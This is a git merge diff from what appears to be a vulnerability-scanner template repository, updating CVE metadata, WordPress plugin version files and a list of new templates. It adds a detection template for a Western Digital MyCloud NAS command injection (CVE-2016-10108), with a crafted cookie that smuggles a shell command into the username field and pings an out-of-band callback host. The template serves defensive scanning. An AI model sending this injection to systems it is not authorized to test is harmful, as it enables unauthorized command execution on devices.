Merge branch 'main' into main

.new-additions

@@ -1,13 +1,24 @@
 http/cnvd/2021/CNVD-2021-32799.yaml
+http/cves/2016/CVE-2016-10108.yaml
 http/cves/2020/CVE-2020-11798.yaml
 http/cves/2022/CVE-2022-22897.yaml
 http/cves/2023/CVE-2023-20073.yaml
+http/cves/2023/CVE-2023-26469.yaml
 http/cves/2023/CVE-2023-27034.yaml
 http/cves/2023/CVE-2023-30150.yaml
+http/cves/2023/CVE-2023-32563.yaml
+http/cves/2023/CVE-2023-34124.yaml
+http/cves/2023/CVE-2023-36844.yaml
+http/exposed-panels/aspcms-backend-panel.yaml
 http/exposed-panels/greenbone-panel.yaml
+http/misconfiguration/ecology-info-leak.yaml
 http/misconfiguration/php-debugbar-exposure.yaml
 http/takeovers/lemlist-takeover.yaml
+http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
 http/technologies/wordpress/plugins/wp-seopress.yaml
+http/vulnerabilities/hikvision/hikvision-fastjson-rce.yaml
 http/vulnerabilities/hikvision/hikvision-ivms-file-upload-bypass.yaml
+http/vulnerabilities/jorani/jorani-benjamin-xss.yaml
+http/vulnerabilities/other/landray-oa-datajson-rce.yaml
 http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml
 workflows/kev-workflow.yaml

cves.json

@@ -336,6 +336,7 @@
 {"ID":"CVE-2016-1000154","Info":{"Name":"WordPress WHIZZ \u003c=1.0.7 - Cross-Site Scripting","Severity":"medium","Description":"WordPress plugin WHIZZ 1.07 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2016/CVE-2016-1000154.yaml"}
 {"ID":"CVE-2016-1000155","Info":{"Name":"WordPress WPSOLR \u003c=8.6 - Cross-Site Scripting","Severity":"medium","Description":"WordPress WPSOLR 8.6 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2016/CVE-2016-1000155.yaml"}
 {"ID":"CVE-2016-10033","Info":{"Name":"WordPress PHPMailer \u003c 5.2.18 - Remote Code Execution","Severity":"critical","Description":"WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property in isMail transport.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-10033.yaml"}
+{"ID":"CVE-2016-10108","Info":{"Name":"Western Digital MyCloud NAS - Command Injection","Severity":"critical","Description":"Unauthenticated Remote Command injection as root occurs in the Western Digital MyCloud NAS 2.11.142 /web/google_analytics.php URL via a modified arg parameter in the POST data.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-10108.yaml"}
 {"ID":"CVE-2016-10134","Info":{"Name":"Zabbix - SQL Injection","Severity":"critical","Description":"Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php and perform SQL injection attacks.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-10134.yaml"}
 {"ID":"CVE-2016-10367","Info":{"Name":"Opsview Monitor Pro - Local File Inclusion","Severity":"high","Description":"Opsview Monitor Pro prior to 5.1.0.162300841, prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch is vulnerable to unauthenticated local file inclusion and can be exploited by issuing a specially crafted HTTP GET request utilizing a simple bypass.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2016/CVE-2016-10367.yaml"}
 {"ID":"CVE-2016-10368","Info":{"Name":"Opsview Monitor Pro - Open Redirect","Severity":"medium","Description":"Opsview Monitor Pro before 5.1.0.162300841, before 5.0.2.27475, before 4.6.4.162391051, and 4.5.x without a certain 2016 security patch contains an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via the back parameter to the login URI.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2016/CVE-2016-10368.yaml"}
@@ -1960,12 +1961,14 @@
 {"ID":"CVE-2023-32235","Info":{"Name":"Ghost CMS \u003c 5.42.1 - Path Traversal","Severity":"high","Description":"Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-32235.yaml"}
 {"ID":"CVE-2023-32243","Info":{"Name":"WordPress Elementor Lite 5.7.1 - Arbitrary Password Reset","Severity":"critical","Description":"Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-32243.yaml"}
 {"ID":"CVE-2023-32315","Info":{"Name":"Openfire Administration Console - Authentication Bypass","Severity":"high","Description":"Openfire is an XMPP server licensed under the Open Source Apache License. Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for administrative users. This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-32315.yaml"}
+{"ID":"CVE-2023-32563","Info":{"Name":"Ivanti Avalanche - Remote Code Execution","Severity":"critical","Description":"An unauthenticated attacker could achieve the code execution through a RemoteControl server.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-32563.yaml"}
 {"ID":"CVE-2023-33338","Info":{"Name":"Old Age Home Management System v1.0 - SQL Injection","Severity":"critical","Description":"Old Age Home Management 1.0 is vulnerable to SQL Injection via the username parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-33338.yaml"}
 {"ID":"CVE-2023-33439","Info":{"Name":"Faculty Evaluation System v1.0 - SQL Injection","Severity":"high","Description":"Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/admin/manage_task.php?id=\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-33439.yaml"}
 {"ID":"CVE-2023-33440","Info":{"Name":"Faculty Evaluation System v1.0 - Remote Code Execution","Severity":"high","Description":"Sourcecodester Faculty Evaluation System v1.0 is vulnerable to arbitrary code execution via /eval/ajax.php?action=save_user.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-33440.yaml"}
 {"ID":"CVE-2023-3345","Info":{"Name":"LMS by Masteriyo \u003c 1.6.8 - Information Exposure","Severity":"medium","Description":"The plugin does not properly safeguards sensitive user information, like other user's email addresses, making it possible for any students to leak them via some of the plugin's REST API endpoints.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-3345.yaml"}
 {"ID":"CVE-2023-33510","Info":{"Name":"Jeecg P3 Biz Chat - Local File Inclusion","Severity":"high","Description":"Jeecg P3 Biz Chat 1.0.5 allows remote attackers to read arbitrary files through specific parameters.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-33510.yaml"}
 {"ID":"CVE-2023-33568","Info":{"Name":"Dolibarr Unauthenticated Contacts Database Theft","Severity":"high","Description":"An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-33568.yaml"}
+{"ID":"CVE-2023-34124","Info":{"Name":"SonicWall GMS and Analytics Web Services - Shell Injection","Severity":"critical","Description":"The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34124.yaml"}
 {"ID":"CVE-2023-34362","Info":{"Name":"MOVEit Transfer - Remote Code Execution","Severity":"critical","Description":"In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), a SQL injection vulnerability has been found in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database, and execute SQL statements that alter or delete database elements. NOTE: this is exploited in the wild in May and June 2023; exploitation of unpatched systems can occur via HTTP or HTTPS. All versions (e.g., 2020.0 and 2019x) before the five explicitly mentioned versions are affected, including older unsupported versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34362.yaml"}
 {"ID":"CVE-2023-34537","Info":{"Name":"Hoteldruid 3.0.5 - Cross-Site Scripting","Severity":"medium","Description":"A Reflected XSS was discovered in HotelDruid version 3.0.5, an attacker can issue malicious code/command on affected webpage's parameter to trick user on browser and/or exfiltrate data.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-34537.yaml"}
 {"ID":"CVE-2023-34598","Info":{"Name":"Gibbon v25.0.0 - Local File Inclusion","Severity":"critical","Description":"Gibbon v25.0.0 is vulnerable to a Local File Inclusion (LFI) vulnerability where it's possible to include the content of several files present in the installation folder in the server's response.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34598.yaml"}
@@ -1983,6 +1986,7 @@
 {"ID":"CVE-2023-36287","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST controller parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36287.yaml"}
 {"ID":"CVE-2023-36289","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36289.yaml"}
 {"ID":"CVE-2023-36346","Info":{"Name":"POS Codekop v2.0 - Cross-site Scripting","Severity":"medium","Description":"POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36346.yaml"}
+{"ID":"CVE-2023-36844","Info":{"Name":"Juniper Devices - Remote Code Execution","Severity":"critical","Description":"Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-36844.yaml"}
 {"ID":"CVE-2023-36934","Info":{"Name":"MOVEit Transfer - SQL Injection","Severity":"critical","Description":"In Progress MOVEit Transfer before 2020.1.11 (12.1.11), 2021.0.9 (13.0.9), 2021.1.7 (13.1.7), 2022.0.7 (14.0.7), 2022.1.8 (14.1.8), and 2023.0.4 (15.0.4), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to the MOVEit Transfer database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-36934.yaml"}
 {"ID":"CVE-2023-37265","Info":{"Name":"CasaOS  \u003c 0.4.4 - Authentication Bypass via Internal IP","Severity":"critical","Description":"CasaOS is an open-source Personal Cloud system. Due to a lack of IP address verification an unauthenticated attackers can execute arbitrary commands as `root` on CasaOS instances. The problem was addressed by improving the detection of client IP addresses in `391dd7f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-37265.yaml"}
 {"ID":"CVE-2023-37266","Info":{"Name":"CasaOS  \u003c 0.4.4 - Authentication Bypass via Random JWT Token","Severity":"critical","Description":"CasaOS is an open-source Personal Cloud system. Unauthenticated attackers can craft arbitrary JWTs and access features that usually require authentication and execute arbitrary commands as `root` on CasaOS instances. This problem was addressed by improving the validation of JWTs in commit `705bf1f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-37266.yaml"}

cves.json-checksum.txt

@@ -1 +1 @@
-10d9a27947a3f24e33157abe7c7a3bfc
+308d34aa657fe5afcd52692063fe2203

helpers/wordpress/plugins/coblocks.txt

@@ -1 +1 @@
-3.1.2
+3.1.3

helpers/wordpress/plugins/disable-comments.txt

@@ -1 +1 @@
-2.4.4
+2.4.5

helpers/wordpress/plugins/elementskit-lite.txt

@@ -1 +1 @@
-2.9.0
+2.9.2

helpers/wordpress/plugins/google-listings-and-ads.txt

@@ -1 +1 @@
-2.5.3
+2.5.4

helpers/wordpress/plugins/google-site-kit.txt

@@ -1 +1 @@
-1.107.0
+1.108.0

helpers/wordpress/plugins/gutenberg.txt

@@ -1 +1 @@
-16.5.0
+16.5.1

helpers/wordpress/plugins/host-webfonts-local.txt

@@ -1 +1 @@
-5.6.6
+5.6.7

helpers/wordpress/plugins/insert-headers-and-footers.txt

@@ -1 +1 @@
-2.1.1
+2.1.2

helpers/wordpress/plugins/jetpack-boost.txt

@@ -1 +1 @@
-2.0.1
+2.0.2

helpers/wordpress/plugins/leadin.txt

@@ -1 +1 @@
-10.2.1
+10.2.3

helpers/wordpress/plugins/limit-login-attempts-reloaded.txt

@@ -1 +1 @@
-2.25.23
+2.25.24

helpers/wordpress/plugins/mailchimp-for-wp.txt

@@ -1 +1 @@
-4.9.6
+4.9.7

helpers/wordpress/plugins/mailpoet.txt

@@ -1 +1 @@
-4.25.0
+4.26.0

helpers/wordpress/plugins/malcare-security.txt

@@ -1 +1 @@
-5.22
+5.24

helpers/wordpress/plugins/newsletter.txt

@@ -1 +1 @@
-7.9.1
+7.9.2

helpers/wordpress/plugins/pixelyoursite.txt

@@ -1 +1 @@
-9.4.2
+9.4.4

helpers/wordpress/plugins/post-smtp.txt

@@ -1 +1 @@
-2.5.9.3
+2.5.9.4

helpers/wordpress/plugins/premium-addons-for-elementor.txt

@@ -1 +1 @@
-4.10.6
+4.10.7

helpers/wordpress/plugins/siteorigin-panels.txt

@@ -1 +1 @@
-2.25.2
+2.25.3

helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt

@@ -1 +1 @@
-2.7.6
+2.7.7

helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt

@@ -1 +1 @@
-1.9.0
+1.9.1

helpers/wordpress/plugins/woocommerce-paypal-payments.txt

@@ -1 +1 @@
-2.2.1
+2.2.2

helpers/wordpress/plugins/woocommerce.txt

@@ -1 +1 @@
-8.0.2
+8.0.3

helpers/wordpress/plugins/wp-google-maps.txt

@@ -1 +1 @@
-9.0.23
+9.0.24

helpers/wordpress/plugins/wp-mail-smtp.txt

@@ -1 +1 @@
-3.8.2
+3.9.0

helpers/wordpress/plugins/wp-migrate-db.txt

@@ -1 +1 @@
-2.6.8
+2.6.9

helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt

@@ -0,0 +1 @@
+10.5

helpers/wordpress/plugins/wp-statistics.txt

@@ -1 +1 @@
-14.1.5
+14.1.6

helpers/wordpress/plugins/wp-user-avatar.txt

@@ -1 +1 @@
-4.13.0
+4.13.1

http/cves/2016/CVE-2016-10108.yaml

@@ -0,0 +1,40 @@
+id: CVE-2016-10108
+
+info:
+  name: Western Digital MyCloud NAS - Command Injection
+  author: DhiyaneshDk
+  severity: critical
+  description: |
+    Unauthenticated Remote Command injection as root occurs in the Western Digital MyCloud NAS 2.11.142 /web/google_analytics.php URL via a modified arg parameter in the POST data.
+  reference:
+    - https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-10108
+    - https://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2016-10108
+    cwe-id: CWE-77
+    epss-score: 0.01264
+    cpe: cpe:2.3:a:western_digital:mycloud_nas:2.11.142:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    shodan-query: http.favicon.hash:-1074357885
+    vendor: western_digital
+    product: mycloud_nas
+  tags: cve,cve2016,rce,oast,wdcloud
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: isAdmin=1; username=admin|echo%20`ping -c 3 {{interactsh-url}}`; local_login=1
+
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(body, "WDMyCloud")
+          - contains(interactsh_protocol, "dns")
+          - status_code == 200
+        condition: and